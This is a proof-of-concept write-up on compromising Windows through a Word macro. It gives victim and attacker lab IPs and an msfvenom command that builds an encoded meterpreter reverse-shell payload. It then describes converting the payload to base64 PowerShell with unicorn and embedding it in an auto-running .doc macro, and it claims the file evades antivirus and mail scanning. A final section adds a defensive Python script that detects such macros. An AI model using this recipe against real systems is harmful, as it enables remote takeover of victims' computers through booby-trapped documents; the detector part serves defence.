Windows Exploit with Word Macro
1. Exploit Info
This PoC uses a Microsoft Word file to compromise the victim's computer. Malicious VB code is inserted into a Word macro; when the victim opens the file, the code runs and opens a reverse shell.
2. Target Information
- Victim :
IP Address : 192.168.56.132
Mail : mail.naver.com
OS : Windows 10 pro x86-64 kor
MS Word ver : word 2016 professional plus
AV : yes ( with virustotal.com )
- Attacker :
IP Address : 192.168.56.129
OS : Kali Linux v2016.01 x86-64
3. Exploit
This time, we use the macro feature to execute malicious code (reverse shell code).
This is enough to exploit any target running a version of MS Office that supports macros.
1. First, we need to make our own reverse shell payload with 'msfvenom'.
[ Options : msfvenom -p windows/meterpreter/reverse_tcp 192.168.0.35 4444 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c ]
In short, we make a reverse shell payload encoded with shikata_ga_nai (a polymorphic XOR encoder).
2. Second, we use a custom script that generates PowerShell code. That code includes the above payload encoded with base64.
The macro.txt data looks like below.
Just put the macro.txt data into the macro of any .doc file.
Then, when the victim opens that .doc file, the code is executed automatically.
3. Before we attack with this file, let's check it with AVs and the mail virus detector.
There are no problems with the AVs.
4. If the code executes normally, we get the victim's shell, like below.
- End of PoC -
4. Analyze
Converting the reverse shell payload into PowerShell code:
Reference : https://github.com/trustedsec/unicorn
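From the defender's side, the macro described in step 2 has three static traits that can be checked even when AV signatures miss the file: an auto-run entry point, a process launch, and base64-encoded PowerShell. The following triage sketch is an added example, not code from this post or from unicorn; it assumes the VBA source has already been extracted from the document, and the function name, result keys and sample macro are constructed for illustration.

```python
import base64
import re

# Entry points Office runs on open without further user action.
AUTO_EXEC = re.compile(r"\bSub\s+(AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I)
# VBA calls that can start an external process.
LAUNCH = re.compile(r"\b(?:Shell|CreateObject)\b", re.I)
# String concatenation (with optional "_" line continuation) used to split long literals.
CONCAT = re.compile(r'"\s*[&+]\s*_?\s*"')
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def triage_macro(vba_text):
    """Flag a macro that auto-runs, spawns a process and carries encoded PowerShell."""
    joined = CONCAT.sub("", vba_text)  # re-join split string literals first
    decoded = []
    for blob in B64_RUN.findall(joined):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue
        # PowerShell -EncodedCommand text is UTF-16LE
        decoded.append(raw.decode("utf-16-le", errors="replace"))
    auto_exec = sorted({name.lower() for name in AUTO_EXEC.findall(joined)})
    launches = bool(LAUNCH.search(joined))
    powershell = "powershell" in joined.lower()
    return {
        "auto_exec": auto_exec,
        "launches_process": launches,
        "powershell": powershell,
        "decoded": decoded,
        "suspicious": bool(auto_exec and launches and (powershell or decoded)),
    }


# Constructed sample: inert command, string literal split across a line continuation.
_B64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim c As String\n"
    f'    c = "powershell -enc {_B64[:30]}" & _\n'
    f'        "{_B64[30:]}"\n'
    "    Shell c, 0\n"
    "End Sub\n"
)

if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The decoded text is what an analyst reads next; in a real sample it is the PowerShell stage rather than the inert string used here.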